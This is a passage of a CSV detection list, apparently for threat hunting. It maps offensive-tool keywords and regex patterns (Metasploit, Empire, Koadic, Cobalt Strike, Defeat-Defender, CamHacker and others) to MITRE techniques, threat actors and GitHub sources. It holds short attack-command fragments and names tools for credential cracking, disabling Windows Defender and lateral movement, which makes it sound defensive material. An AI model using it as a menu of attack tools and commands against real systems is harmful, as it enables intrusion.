- T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/lengjibo/NetUser","1","1","N/A","10","10","413","92","2021-09-29T14:22:09Z","2020-01-09T08:33:27Z" "*enigma_fileless_uac_bypass*",".{0,1000}enigma_fileless_uac_bypass.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1710","584","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z" "*enigma0x3*",".{0,1000}enigma0x3.{0,1000}","offensive_tool_keyword","Github Username","Github Author of malicious script and eploitaiton tools ","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/enigma0x3","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*enjoiz/Privesc*",".{0,1000}enjoiz\/Privesc.{0,1000}","offensive_tool_keyword","Privesc","Windows PowerShell script that finds misconfiguration issues which can lead to privilege escalation","T1068 - T1548 - T1082 - T1078","TA0004","N/A","N/A","Privilege Escalation","https://github.com/enjoiz/Privesc","1","1","N/A","10","5","469","90","2023-03-06T10:27:00Z","2015-11-19T13:22:01Z" "*enkomio/AlanFramework*",".{0,1000}enkomio\/AlanFramework.{0,1000}","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","1","N/A","10","10","460","71","2024-01-24T20:30:39Z","2021-01-26T22:56:50Z" "*enpass2john.py*",".{0,1000}enpass2john\.py.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*enpass5tojohn.py*",".{0,1000}enpass5tojohn\.py.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*Enter the Direct Link of malware : *",".{0,1000}Enter\sthe\sDirect\sLink\sof\smalware\s\:\s.{0,1000}","offensive_tool_keyword","Defeat-Defender","script to dismantle complete windows defender protection and even bypass tamper protection - Disable Windows-Defender Permanently.","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/swagkarna/Defeat-Defender-V1.2.0","1","0","N/A","10","10","1364","299","2023-10-20T17:55:09Z","2020-12-10T07:22:06Z" "*Enter your loclx authtoken:*",".{0,1000}Enter\syour\sloclx\sauthtoken\:.{0,1000}","offensive_tool_keyword","CamHacker","Camera phishing tool. If anyone opens link generated by CamHacker and permits camera access his/her photo will be captured!","T1598 - T1204 - T1566.001","TA0009 - TA0010 - TA0043","N/A","N/A","Phishing","https://github.com/KasRoudra/CamHacker","1","0","N/A","10","N/A","N/A","N/A","N/A","N/A" "*Enter-SMBSession -ComputerName *",".{0,1000}Enter\-SMBSession\s\-ComputerName\s.{0,1000}","offensive_tool_keyword","Invoke-SMBRemoting","Interactive Shell and Command Execution over Named-Pipes (SMB)","T1059 - T1021.002 - T1572","TA0002 - TA0008 - TA0011","N/A","N/A","Lateral Movement","https://github.com/Leo4j/Invoke-SMBRemoting","1","0","N/A","9","1","29","9","2024-05-01T13:42:06Z","2023-09-06T16:00:47Z" "*Enter-SMBSession* -PipeName * -ServiceName *",".{0,1000}Enter\-SMBSession.{0,1000}\s\-PipeName\s.{0,1000}\s\-ServiceName\s.{0,1000}","offensive_tool_keyword","Invoke-SMBRemoting","Interactive Shell and Command Execution over Named-Pipes (SMB)","T1059 - T1021.002 - T1572","TA0002 - TA0008 - TA0011","N/A","N/A","Lateral Movement","https://github.com/Leo4j/Invoke-SMBRemoting","1","0","N/A","9","1","29","9","2024-05-01T13:42:06Z","2023-09-06T16:00:47Z" "*Enter-WmiShell *",".{0,1000}Enter\-WmiShell\s.{0,1000}","offensive_tool_keyword","Wmisploit","WmiSploit is a small set of PowerShell scripts that leverage the WMI service for post-exploitation use.","T1087 - T1059.001 - T1047","TA0003 - TA0002 - TA0008","N/A","N/A","POST Exploitation tools","https://github.com/secabstraction/WmiSploit","1","0","N/A","N/A","2","163","39","2015-08-28T23:56:00Z","2015-03-15T03:30:02Z" "*Enter-WmiShell.ps1*",".{0,1000}Enter\-WmiShell\.ps1.{0,1000}","offensive_tool_keyword","Wmisploit","WmiSploit is a small set of PowerShell scripts that leverage the WMI service for post-exploitation use.","T1087 - T1059.001 - T1047","TA0003 - TA0002 - TA0008","N/A","N/A","POST Exploitation tools","https://github.com/secabstraction/WmiSploit","1","1","N/A","N/A","2","163","39","2015-08-28T23:56:00Z","2015-03-15T03:30:02Z" "*--entrypoint Dinjector*",".{0,1000}\-\-entrypoint\sDinjector.{0,1000}","offensive_tool_keyword","Dinjector","Collection of shellcode injection techniques packed in a D/Invoke weaponized DLL","T1055 - T1055.012 - T1055.001 - T1027.002","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/Metro-Holografix/DInjector","1","0","private github repo","10","","N/A","N/A","N/A","N/A" "*enum_ad_service_principal_names *",".{0,1000}enum_ad_service_principal_names\s.{0,1000}","offensive_tool_keyword","metasploit-payloads","shell payload","T1059.001 - T1027 - T1210.001","TA0002 - TA0003 - TA0007","N/A","N/A","POST Exploitation tools","https://github.com/rapid7/metasploit-payloads","1","0","N/A","10","10","1659","656","2024-04-18T10:56:49Z","2014-04-03T21:18:24Z" "*enum_artifacts_list.txt*",".{0,1000}enum_artifacts_list\.txt.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*enum_av_excluded.rb*",".{0,1000}enum_av_excluded\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*enum_avproducts.py*",".{0,1000}enum_avproducts\.py.{0,1000}","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1210 T1570 T1021 T1595 T1592 T1589 T1590 ","N/A","N/A","N/A","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","8133","1633","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z" "*enum_brocade.md*",".{0,1000}enum_brocade\.md.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*enum_domain_info.py*",".{0,1000}enum_domain_info\.py.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","243","75","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" "*enum_enumdomusers(*",".{0,1000}enum_enumdomusers\(.{0,1000}","offensive_tool_keyword","nullinux","Internal penetration testing tool for Linux that can be used to enumerate OS information/domain information/ shares/ directories and users through SMB.","T1087 - T1016 - T1077 - T1018","TA0007 - TA0006","N/A","N/A","Discovery","https://github.com/m8sec/nullinux","1","0","N/A","7","6","551","100","2022-08-12T01:56:15Z","2016-04-28T16:45:02Z" "*enum_firefox.rb*",".{0,1000}enum_firefox\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*enum_hostfile.md*",".{0,1000}enum_hostfile\.md.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*enum_logged_on_users*",".{0,1000}enum_logged_on_users.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*enum_logged_on_users.*",".{0,1000}enum_logged_on_users\..{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*enum_mikrotik.md*",".{0,1000}enum_mikrotik\.md.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*enum_ms_product_keys.*",".{0,1000}enum_ms_product_keys\..{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*enum_printers.py*",".{0,1000}enum_printers\.py.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","243","75","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" "*enum_shares.py*",".{0,1000}enum_shares\.py.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","243","75","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" "*enum_shares.rb*",".{0,1000}enum_shares\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*enum_vmware.rb*",".{0,1000}enum_vmware\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*enum_vyos.md*",".{0,1000}enum_vyos\.md.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*enum4linux*",".{0,1000}enum4linux.{0,1000}","offensive_tool_keyword","enum4linux","Enum4linux is a tool for enumerating information from Windows and Samba systems. It attempts to offer similar functionality to enum.exe ","T1018 - T1087.002 - T1135 - T1049 - T1033","TA0007 - TA0009","N/A","N/A","Reconnaissance","https://github.com/CiscoCXSecurity/enum4linux","1","1","N/A","N/A","10","1038","231","2023-05-09T22:54:24Z","2015-07-31T21:06:03Z" "*enum4linux_*.txt*",".{0,1000}enum4linux_.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "*enum4linux-ng -A -u *",".{0,1000}enum4linux\-ng\s\-A\s\-u\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*EnumCLR.exe*",".{0,1000}EnumCLR\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF to identify processes with the CLR loaded with a goal of identifying SpawnTo / injection candidates.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://gist.github.com/G0ldenGunSec/8ca0e853dd5637af2881697f8de6aecc","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*Enum-Creds*",".{0,1000}Enum\-Creds.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*enumdomains;quit*",".{0,1000}enumdomains\;quit.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tools","https://github.com/Orange-Cyberdefense/arsenal","1","0","commands cheat sheets","8","10","N/A","N/A","N/A","N/A" "*enumdomgroups;quit*",".{0,1000}enumdomgroups\;quit.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tools","https://github.com/Orange-Cyberdefense/arsenal","1","0","commands cheat sheets","8","10","N/A","N/A","N/A","N/A" "*enumdomusers;quit*",".{0,1000}enumdomusers\;quit.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tools","https://github.com/Orange-Cyberdefense/arsenal","1","0","commands cheat sheets","8","10","N/A","N/A","N/A","N/A" "*enumerate.cna*",".{0,1000}enumerate\.cna.{0,1000}","offensive_tool_keyword","red-team-scripts","Cobalt Strike Aggressor script function and alias to perform some rudimentary Windows host enumeration with Beacon built-in commands (i.e. no Powershell. binary calls. or process injection). Additionally. adds a basic enumerate alias for Linux based systems in SSH sessions.","T1595 T1590 T1591","N/A","N/A","N/A","Reconnaissance","https://github.com/threatexpress/red-team-scripts","1","1","N/A","N/A","10","1095","192","2019-11-18T05:30:18Z","2017-05-01T13:53:05Z" "*EnumerateAllDomainControllers*",".{0,1000}EnumerateAllDomainControllers.{0,1000}","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/LaresLLC/SlinkyCat","1","0","AD Enumeration","7","1","73","5","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z" "*Enumerate-AllHighPrivilegePrincipals*",".{0,1000}Enumerate\-AllHighPrivilegePrincipals.{0,1000}","offensive_tool_keyword","Azure-AccessPermissions","Easy to use PowerShell script to enumerate access permissions in an Azure Active Directory environment.","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/csandker/Azure-AccessPermissions","1","0","AD Enumeration","6","2","103","18","2023-02-21T06:46:24Z","2022-10-19T10:33:24Z" "*EnumerateDomainGpo*",".{0,1000}EnumerateDomainGpo.{0,1000}","offensive_tool_keyword","Group3r","Find vulnerabilities in AD Group Policy","T1484.002 - T1069.002 - T1087.002","TA0007 - TA0040","N/A","N/A","Discovery","https://github.com/Group3r/Group3r","1","0","AD Enumeration","7","6","592","55","2024-03-19T03:08:39Z","2021-07-05T05:05:42Z" "*Enumerate-MFAStatusOfHighPrivilegePrincipals*",".{0,1000}Enumerate\-MFAStatusOfHighPrivilegePrincipals.{0,1000}","offensive_tool_keyword","Azure-AccessPermissions","Easy to use PowerShell script to enumerate access permissions in an Azure Active Directory environment.","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/csandker/Azure-AccessPermissions","1","0","AD Enumeration","6","2","103","18","2023-02-21T06:46:24Z","2022-10-19T10:33:24Z" "*Enumerating Administrators group, please wait*",".{0,1000}Enumerating\sAdministrators\sgroup,\splease\swait.{0,1000}","offensive_tool_keyword","doucme","leverages the NetUserAdd Win32 API to create a new computer account","T1136 - T1098 - T1078","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Ben0xA/DoUCMe","1","0","N/A","9","1","70","18","2021-05-01T03:15:59Z","2021-04-29T15:41:28Z" "*Enumerating new user, please wait*",".{0,1000}Enumerating\snew\suser,\splease\swait.{0,1000}","offensive_tool_keyword","doucme","leverages the NetUserAdd Win32 API to create a new computer account","T1136 - T1098 - T1078","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Ben0xA/DoUCMe","1","0","N/A","9","1","70","18","2021-05-01T03:15:59Z","2021-04-29T15:41:28Z" "*Enumeration.Net.GetNetLocalGroupMembers(*",".{0,1000}Enumeration\.Net\.GetNetLocalGroupMembers\(.{0,1000}","offensive_tool_keyword","SharpSploit","SharpSploit is a .NET post-exploitation library written in C# that aims to highlight the attack surface of .NET and make the use of offensive .NET easier for red teamers.","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/cobbr/SharpSploit","1","0","N/A","10","10","1692","303","2021-08-12T18:23:15Z","2018-09-20T14:22:37Z" "*Enumeration/DesktopACL*",".{0,1000}Enumeration\/DesktopACL.{0,1000}","offensive_tool_keyword","Tokenvator","A tool to elevate privilege with Windows Tokens","T1134 - T1078","TA0003 - TA0004","N/A","N/A","Privilege 